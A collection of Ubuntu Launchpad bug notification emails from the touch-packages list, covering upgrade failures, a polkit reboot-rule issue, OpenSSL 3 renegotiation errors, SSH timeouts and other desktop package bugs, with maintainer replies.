18.04.1 LTS "Bionic Beaver" - Release amd64 (20180725) SourcePackage: gcr UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gcr/+bug/1969118/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1968845] Re: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot
This may be a duplicate of https://launchpad.net/bugs/1969162 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to dbus in Ubuntu. https://bugs.launchpad.net/bugs/1968845 Title: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot Status in dbus package in Ubuntu: New Bug description: Upgrading on a virtual machine from 20.04 to 22.04. I have had this happen twice now, I got one upgrade done without this bug. Basically the package installation stops at dbus package asking for a reboot as it was unable to upgrade as dbus-daemon was running. And rebooting at this stage obviously will cause a non-functioning system. Added a screenshot of the upgrade window. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1968845/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1969593] Re: rules to prevent non-root users from rebooting not taken into account
** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to policykit-1 in Ubuntu. https://bugs.launchpad.net/bugs/1969593 Title: rules to prevent non-root users from rebooting not taken into account Status in policykit-1 package in Ubuntu: New Bug description: On fresh Ubuntu Jammy installation, I add a "/etc/polkit-1/localauthority/90-mandatory.d/restriction.pkla" file with the following contents : [Disable power-off] Identity=unix-user:* Action=org.freedesktop.login1.power-off ResultActive=no ResultInactive=no ResultAny=no [Disable power-off when others are logged in] Identity=unix-user:* Action=org.freedesktop.login1.power-off-multiple-sessions ResultActive=no ResultInactive=no ResultAny=no [Disable_reboot] Identity=unix-user:* Action=org.freedesktop.login1.reboot ResultActive=no ResultInactive=no ResultAny=no [Disable_reboot_when_others_are_logged_in] Identity=unix-user:* Action=org.freedesktop.login1.reboot-multiple-sessions ResultActive=no ResultInactive=no ResultAny=no It must prevent non-root users from shutdowning and rebooting the system. But it only prevent shutdowning. Rebooting is still possible for a non-root user. We can see it using pkcheck command (as a non-root user) : $ pkcheck --action-id org.freedesktop.login1.power-off --process $PPID ; echo $? Not authorized. 1 $ pkcheck --action-id org.freedesktop.login1.reboot --process $PPID ; echo $? 0 As this problem can lead to unexpected reboot on multi-users systems (a disponibilty concern), I checked the "This bug is a security vulnerability" box. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: policykit-1 0.105-33 ProcVersionSignature: Ubuntu 5.15.0-25.25-generic 5.15.30 Uname: Linux 5.15.0-25-generic x86_64 ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: ubuntu:GNOME Date: Wed Apr 20 10:53:27 2022 InstallationDate: Installed on 2022-04-20 (0 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 (20220419) ProcEnviron: TERM=xterm-256color PATH=(custom, no username) XDG_RUNTIME_DIR= LANG=fr_FR.UTF-8 SHELL=/bin/bash SourcePackage: policykit-1 UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/policykit-1/+bug/1969593/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1969593] Re: rules to prevent non-root users from rebooting not taken into account
** Also affects: systemd (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1969593 Title: rules to prevent non-root users from rebooting not taken into account Status in policykit-1 package in Ubuntu: New Status in systemd package in Ubuntu: New Bug description: On fresh Ubuntu Jammy installation, I add a "/etc/polkit-1/localauthority/90-mandatory.d/restriction.pkla" file with the following contents : [Disable power-off] Identity=unix-user:* Action=org.freedesktop.login1.power-off ResultActive=no ResultInactive=no ResultAny=no [Disable power-off when others are logged in] Identity=unix-user:* Action=org.freedesktop.login1.power-off-multiple-sessions ResultActive=no ResultInactive=no ResultAny=no [Disable_reboot] Identity=unix-user:* Action=org.freedesktop.login1.reboot ResultActive=no ResultInactive=no ResultAny=no [Disable_reboot_when_others_are_logged_in] Identity=unix-user:* Action=org.freedesktop.login1.reboot-multiple-sessions ResultActive=no ResultInactive=no ResultAny=no It must prevent non-root users from shutdowning and rebooting the system. But it only prevent shutdowning. Rebooting is still possible for a non-root user. We can see it using pkcheck command (as a non-root user) : $ pkcheck --action-id org.freedesktop.login1.power-off --process $PPID ; echo $? Not authorized. 1 $ pkcheck --action-id org.freedesktop.login1.reboot --process $PPID ; echo $? 0 As this problem can lead to unexpected reboot on multi-users systems (a disponibilty concern), I checked the "This bug is a security vulnerability" box. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: policykit-1 0.105-33 ProcVersionSignature: Ubuntu 5.15.0-25.25-generic 5.15.30 Uname: Linux 5.15.0-25-generic x86_64 ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: ubuntu:GNOME Date: Wed Apr 20 10:53:27 2022 InstallationDate: Installed on 2022-04-20 (0 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 (20220419) ProcEnviron: TERM=xterm-256color PATH=(custom, no username) XDG_RUNTIME_DIR= LANG=fr_FR.UTF-8 SHELL=/bin/bash SourcePackage: policykit-1 UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/policykit-1/+bug/1969593/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1970459] Re: import of ca-certificate in browser does not work
I switched this from ca-certificates to firefox and chromium-browser, since both browsers manage their own certificate lists and don't use the system-provided ca-certificates. (You manage that with different tools, see the first few lines of /etc/ca-certificates.conf for details.) Thanks ** Package changed: ca-certificates (Ubuntu) => firefox (Ubuntu) ** Also affects: chromium-browser (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ca-certificates in Ubuntu. https://bugs.launchpad.net/bugs/1970459 Title: import of ca-certificate in browser does not work Status in chromium-browser package in Ubuntu: New Status in firefox package in Ubuntu: New Bug description: I tried to import a CA root certificate into both Firefox and Chrome. In Firefox, the import button just didn't do anything, in Chrome pressing "import" hangs up the browser. This means I can't reach the intranet of the company I work for. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: ca-certificates 20211016 ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30 Uname: Linux 5.15.0-27-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: ubuntu:GNOME Date: Tue Apr 26 19:16:12 2022 InstallationDate: Installed on 2022-04-23 (3 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 (20220419) PackageArchitecture: all SourcePackage: ca-certificates UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1970459/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1963834] Re: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]
Yes, managing the configurations for the huge variety of cryptography
toolkits on a Linux system is definitely something of a chore. It would
be nice to give people one command they could use to return to unsafe-
but-compatible cryptography -- or enforce only modern cryptography.
Our friends at Red Hat have prepared https://gitlab.com/redhat-
crypto/fedora-crypto-policies -- while a version of this is packaged:
https://launchpad.net/ubuntu/+source/crypto-policies -- I don't believe
it actually works on Ubuntu:
https://bugs.launchpad.net/ubuntu/+source/crypto-policies/+bug/1926664
Maybe someday.
Thanks
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1963834
Title:
openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]
Status in openssl package in Ubuntu:
Won't Fix
Bug description:
Description:Ubuntu Jammy Jellyfish (development branch)
Release:22.04
openssl:
Installé : 3.0.1-0ubuntu1
Candidat : 3.0.1-0ubuntu1
Table de version :
*** 3.0.1-0ubuntu1 500
500 http://ca.archive.ubuntu.com/ubuntu jammy/main amd64 Packages
100 /var/lib/dpkg/status
Using Ubuntu 22.04, I now get the following error message when
attempting to connect to our office VPN using "gp-saml-gui
(https://github.com/dlenski/gp-saml-gui)" :
#
dominique@Doombuntu:~$ .local/bin/gp-saml-gui server_url
Looking for SAML auth tags in response to
https://server_url/global-protect/prelogin.esp...
usage: gp-saml-gui [-h] [--no-verify] [-C COOKIES | -K] [-g | -p] [-c CERT]
[--key KEY] [-v | -q] [-x | -P | -S] [-u] [--clientos {Windows,Linux,Mac}] [-f
EXTRA] server [openconnect_extra ...]
gp-saml-gui: error: SSL error: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]
unsafe legacy renegotiation disabled (_ssl.c:997)
#
#
#
gp-saml-gui uses python module requests.
Using python ide, I can get the same results :
#
>>> r = requests.get('https://server_url')
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 699,
in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 382,
in _make_request
self._validate_conn(conn)
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 1012,
in _validate_conn
conn.connect()
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 411, in
connect
self.sock = ssl_wrap_socket(
File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 449, in
ssl_wrap_socket
ssl_sock = _ssl_wrap_socket_impl(
File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 493, in
_ssl_wrap_socket_impl
return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
File "/usr/lib/python3.10/ssl.py", line 512, in wrap_socket
return self.sslsocket_class._create(
File "/usr/lib/python3.10/ssl.py", line 1070, in _create
self.do_handshake()
File "/usr/lib/python3.10/ssl.py", line 1341, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy
renegotiation disabled (_ssl.c:997)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in
send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 755,
in urlopen
retries = retries.increment(
File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 574, in
increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='server_url',
port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1,
'[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation
disabled (_ssl.c:997)')))
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "", line 1, in
File "/usr/lib/python3/dist-packages/requests/api.py", line 76, in get
return request('get', url, params=params, **kwargs)
File "/usr/lib/python3/dist-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 542, in
request
resp = self.send(prep, **send_kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 655, in
send
r = adapter.send(request, **kwargs)
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 514, in
send
raise SSLError(e, request=request)
requests.exceptions.SSLError: HTTPSConnectionPool(host='server_url',
port=443): Max retries exc
[Touch-packages] [Bug 1971650] Re: wrong check for "server" in libssl3.postinst
Possibly related to https://bugs.launchpad.net/bugs/1832421 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1971650 Title: wrong check for "server" in libssl3.postinst Status in openssl package in Ubuntu: New Bug description: A security update has just been applied to my system for openssl, and the 'reboot required' message just popped on my desktop. I looked to see why this was, and found the following code in the libssl3 postinst: # Here we issue the reboot notification for upgrades and # security updates. We do want services to be restarted when we # update for a security issue, but planned by the sysadmin, not # automatically. # Only issue the reboot notification for servers; we proxy this by # testing that the X server is not running (LP: #244250) if ! pidof /usr/lib/xorg/Xorg > /dev/null && [ -x /usr/share/update-notifier/notify-reboot-required ]; then /usr/share/update-notifier/notify-reboot-required fi Now, AFAIK this is the only package that interfaces with notify- reboot-required but omits the notification on desktops, so that seems to be an inconsistent policy; but even if we thought that was the correct policy to apply, the above check for a desktop is not because it doesn't match in the case the user is running Xwayland, which most users not using the nvidia driver will be doing now by default. Also, this is now inside a block that checks for the presence of needrestart, which is part of the server seed; so in effect this notification now *never* fires on servers, it *only* fires on desktops. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: openssl 3.0.2-0ubuntu1.1 ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30 Uname: Linux 5.15.0-27-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: ubuntu:GNOME Date: Thu May 5 05:39:06 2022 InstallationDate: Installed on 2019-12-23 (863 days ago) InstallationMedia: Ubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017) RebootRequiredPkgs: Error: path contained symlinks. SourcePackage: openssl UpgradeStatus: Upgraded to jammy on 2022-04-15 (19 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1971650/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1971888] [NEW] Can not ssh to github.com or gitlab.com when upgrading to 22.04
On Thu, May 05, 2022 at 09:09:07PM -, Alvaro wrote: > acs@lsp-022:~$ ssh -vT g...@github.com > ... > debug1: connect to address 140.82.121.4 port 22: Connection timed out Note that "Connection timed out" is an error at the TCP level, that indicates that your computer wasn't able to establish a TCP session. ssh's algorithm choices aren't involved yet. Are you sure this machine can communicate with 140.82.121.4:22 at all? $ nc 140.82.112.4 22 SSH-2.0-babeld-78a8149e ^C Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu. https://bugs.launchpad.net/bugs/1971888 Title: Can not ssh to github.com or gitlab.com when upgrading to 22.04 Status in openssh package in Ubuntu: New Bug description: Dear all, After the upgrading to Ubuntu 22.04 I can not use git over ssh. The best way to reproduce the error is: ``` acs@lsp-022:~$ ssh -vT g...@github.com OpenSSH_8.9p1 Ubuntu-3, OpenSSL 3.0.2 15 Mar 2022 debug1: Reading configuration data /etc/ssh/ssh_config debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf matched no files debug1: /etc/ssh/ssh_config line 21: Applying options for * debug1: Connecting to github.com [140.82.121.4] port 22. debug1: connect to address 140.82.121.4 port 22: Connection timed out ``` Before the upgrading I can connect correctly with: ``` ssh -vT g...@github.com OpenSSH_8.2p1 Ubuntu-4ubuntu0.4, OpenSSL 1.1.1f 31 Mar 2020 debug1: Reading configuration data /etc/ssh/ssh_config debug1: /etc/ssh/ssh_config line 21: include /etc/ssh/ssh_config.d/*.conf matched no files debug1: /etc/ssh/ssh_config line 23: Applying options for * debug1: Connecting to github.com [140.82.121.4] port 22. debug1: Connection established ``` The same issue is happening with gitlab.com. Probably it is related with the OpenSSL version. Cheers! -- Alvaro ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: ssh 1:8.9p1-3 ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30 Uname: Linux 5.15.0-27-generic x86_64 ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: GNOME Date: Thu May 5 23:00:33 2022 InstallationDate: Installed on 2021-03-08 (423 days ago) InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1) PackageArchitecture: all SourcePackage: openssh UpgradeStatus: Upgraded to jammy on 2022-05-05 (0 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1971888/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1971101] Re: package linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1
Hello, note your filesystem is full: Filesystem 1K-blocks Used Available Use% Mounted on udev 9812920981292 0% /dev tmpfs 202808 1508201300 1% /run /dev/sda5 11167656 11000192 0 100% / That causes errors like this: cp: error writing '/var/tmp/mkinitramfs_jx7Z98//usr/bin/kmod': No space left on device cp: error writing '/var/tmp/mkinitramfs_jx7Z98//usr/lib/x86_64-linux-gnu/liblzma.so.5.2.4': No space left on device mkdir: cannot create directory ‘/var/tmp/mkinitramfs_jx7Z98/etc/modprobe.d’: No space left on device mkdir: cannot create directory ‘/var/tmp/mkinitramfs_jx7Z98/lib/modprobe.d’: No space left on device mkdir: cannot create directory ‘/var/tmp/mkinitramfs_jx7Z98//etc/modprobe.d’: No space left on device These errors are preventing your system update from finishing. Free up some space on the root filesystem, and then try: sudo apt install -f or sudo dpkg --configure -a The full screen issue may require talking with VirtualBox support. Thanks ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu. https://bugs.launchpad.net/bugs/1971101 Title: package linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1 Status in initramfs-tools package in Ubuntu: New Bug description: Slow system. I get notified all the time. Oh, by the way, I need help getting this virtual screen to go back full screen. Thanks! ProblemType: Package DistroRelease: Ubuntu 20.04 Package: linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 ProcVersionSignature: Ubuntu 5.11.0-41.45~20.04.1-generic 5.11.22 Uname: Linux 5.11.0-41-generic x86_64 ApportVersion: 2.20.11-0ubuntu27.21 Architecture: amd64 CasperMD5CheckResult: skip Date: Sun May 1 01:38:42 2022 ErrorMessage: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1 InstallationDate: Installed on 2021-10-01 (212 days ago) InstallationMedia: Ubuntu 20.04.3 LTS "Focal Fossa" - Release amd64 (20210819) Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 3.8.2-0ubuntu2 PythonDetails: N/A RelatedPackageVersions: dpkg 1.19.7ubuntu3 apt 2.0.6 SourcePackage: initramfs-tools Title: package linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1 UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1971101/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1971221] Re: firefox is flashing
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find. ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1971221 Title: firefox is flashing Status in xorg package in Ubuntu: New Bug description: when firefox window behind other APP windows, it is flashing. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30 Uname: Linux 5.15.0-27-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia .proc.driver.nvidia.capabilities.gpu0: Error: path was not a regular file. .proc.driver.nvidia.capabilities.mig: Error: path was not a regular file. .proc.driver.nvidia.gpus..01.00.0: Error: path was not a regular file. .proc.driver.nvidia.registry: Binary: "" .proc.driver.nvidia.suspend: suspend hibernate resume .proc.driver.nvidia.suspend_depth: default modeset uvm .proc.driver.nvidia.version: NVRM version: NVIDIA UNIX x86_64 Kernel Module 510.60.02 Wed Mar 16 11:24:05 UTC 2022 GCC version: ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: pass CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Tue May 3 11:53:34 2022 DistUpgraded: Fresh install DistroCodename: jammy DistroVariant: ubuntu GraphicsCard: NVIDIA Corporation GP104 [GeForce GTX 1080] [10de:1b80] (rev a1) (prog-if 00 [VGA controller]) Subsystem: Hewlett-Packard Company GP104 [GeForce GTX 1080] [103c:82fb] InstallationDate: Installed on 2022-05-01 (1 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 (20220419) MachineType: ASUS System Product Name ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.15.0-27-generic root=UUID=ff0f1b3b-e57d-46bf-817b-a2bf7bd47098 ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 04/01/2022 dmi.bios.release: 14.4 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: 1404 dmi.board.asset.tag: Default string dmi.board.name: ROG STRIX Z690-A GAMING WIFI D4 dmi.board.vendor: ASUSTeK COMPUTER INC. dmi.board.version: Rev 1.xx dmi.chassis.asset.tag: Default string dmi.chassis.type: 3 dmi.chassis.vendor: Default string dmi.chassis.version: Default string dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvr1404:bd04/01/2022:br14.4:svnASUS:pnSystemProductName:pvrSystemVersion:rvnASUSTeKCOMPUTERINC.:rnROGSTRIXZ690-AGAMINGWIFID4:rvrRev1.xx:cvnDefaultstring:ct3:cvrDefaultstring:skuSKU: dmi.product.family: To be filled by O.E.M. dmi.product.name: System Product Name dmi.product.sku: SKU dmi.product.version: System Version dmi.sys.vendor: ASUS version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.110-1ubuntu1 version.libgl1-mesa-dri: libgl1-mesa-dri 22.0.1-1ubuntu2 version.libgl1-mesa-glx: libgl1-mesa-glx N/A version.nvidia-graphics-drivers: nvidia-graphics-drivers-* N/A version.xserver-xorg-core: xserver-xorg-core 2:21.1.3-2ubuntu2 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2build3 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20210115-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-2build1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1971221/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1608200] Re: please merge openssl from Debian
** Changed in: openssl (Ubuntu) Status: Incomplete => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1608200 Title: please merge openssl from Debian Status in openssl package in Ubuntu: Fix Released Bug description: I'm not aware of any ABI breakages, but I bumped the shlibs min version anyway. Please triple check + dh_makeshlibs -a -V "libssl1.0.0 (>= 1.0.2h)" --add-udeb="libcrypto1.0.0-udeb" -Xengines To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1608200/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
